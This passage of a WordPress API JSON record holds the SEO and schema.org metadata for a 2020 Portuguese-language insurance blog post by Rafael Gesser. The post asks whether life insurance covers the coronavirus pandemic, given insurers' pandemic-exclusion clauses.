Vida?\",\"datePublished\":\"2020-03-28T01:52:47+00:00\",\"dateModified\":\"2020-03-28T02:29:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/\"},\"wordCount\":961,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg\",\"articleSection\":[\"Gest\u00e3o de Benef\u00edcios\",\"Seguro de vida\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/\",\"name\":\"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida? - \u00d4 Insurance\",\"isPartOf\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg\",\"datePublished\":\"2020-03-28T01:52:47+00:00\",\"dateModified\":\"2020-03-28T02:29:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#primaryimage\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg\",\"contentUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg\",\"width\":1200,\"height\":801,\"caption\":\"seguro-de-vida\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/blog.oinsurance.com.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"name\":\"\u00d4 Insurance\",\"description\":\"Seguros Pessoais e Empresariais\",\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\",\"name\":\"\u00d4 Insurance\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"contentUrl\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"width\":409,\"height\":179,\"caption\":\"\u00d4 Insurance\"},\"image\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/oinsurancegroup\/\",\"https:\/\/www.instagram.com\/oinsurance\/\",\"https:\/\/www.linkedin.com\/company\/oinsurance\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\",\"name\":\"Rafael Gesser\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"caption\":\"Rafael Gesser\"}}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida? - \u00d4 Insurance","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/","og_locale":"pt_BR","og_type":"article","og_title":"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida? - \u00d4 Insurance","og_description":"Nos \u00faltimos dias o mercado de seguros, segurados\u00a0e seguradoras\u00a0se movimentaram\u00a0bastante depois\u00a0que\u00a0a OMS\u00a0&#8211;\u00a0Organiza\u00e7\u00e3o Mundial da Sa\u00fade\u00a0decretou pandemia global para o novo\u00a0coronav\u00edrus.\u00a0Consequentemente, muitos segurados levantaram a seguinte quest\u00e3o: O Seguro de Vida cobre a pandemia do coronav\u00edrus? Isto\u00a0porque as principais seguradoras do pa\u00eds t\u00eam cl\u00e1usulas que excluem a indeniza\u00e7\u00e3o do benef\u00edcio em consequ\u00eancia\u00a0de pandemias\u00a0declaradas por \u00f3rg\u00e3o competente.\u00a0 [&hellip;]","og_url":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/","og_site_name":"\u00d4 Insurance","article_publisher":"https:\/\/www.facebook.com\/oinsurancegroup\/","article_published_time":"2020-03-28T01:52:47+00:00","article_modified_time":"2020-03-28T02:29:23+00:00","og_image":[{"width":1200,"height":801,"url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg","type":"image\/jpeg"}],"author":"Rafael Gesser","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Rafael Gesser","Est. tempo de leitura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#article","isPartOf":{"@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/"},"author":{"name":"Rafael Gesser","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223"},"headline":"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida?","datePublished":"2020-03-28T01:52:47+00:00","dateModified":"2020-03-28T02:29:23+00:00","mainEntityOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/"},"wordCount":961,"commentCount":0,"publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg","articleSection":["Gest\u00e3o de Benef\u00edcios","Seguro de vida"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/","url":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/","name":"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida? - \u00d4 Insurance","isPartOf":{"@id":"https:\/\/blog.oinsurance.com.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#primaryimage"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg","datePublished":"2020-03-28T01:52:47+00:00","dateModified":"2020-03-28T02:29:23+00:00","breadcrumb":{"@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#primaryimage","url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg","contentUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/seguro-de-vida-min.jpg","width":1200,"height":801,"caption":"seguro-de-vida"},{"@type":"BreadcrumbList","@id":"https:\/\/oinsurance.com.br\/blog\/seguro-vida-coronavirus\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/blog.oinsurance.com.br\/"},{"@type":"ListItem","position":2,"name":"Afinal, pandemia do coronav\u00edrus tem cobertura pelo Seguro de Vida?"}]},{"@type":"WebSite","@id":"https:\/\/blog.oinsurance.com.br\/#website","url":"https:\/\/blog.oinsurance.com.br\/","name":"\u00d4 Insurance","description":"Seguros Pessoais e Empresariais","publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/blog.oinsurance.com.br\/#organization","name":"\u00d4 Insurance","url":"https:\/\/blog.oinsurance.com.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/","url":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","contentUrl":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","width":409,"height":179,"caption":"\u00d4 Insurance"},"image":{"@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/oinsurancegroup\/","https:\/\/www.instagram.com\/oinsurance\/","https:\/\/www.linkedin.com\/company\/oinsurance\/"]},{"@type":"Person","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223","name":"Rafael Gesser","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","caption":"Rafael Gesser"}}]}},"_links":{"self":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2633"}],"collection":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/comments?post=2633"}],"version-history":[{"count":0,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2633\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media\/2635"}],"wp:attachment":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media?parent=2633"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/categories?post=2633"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/tags?post=2633"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}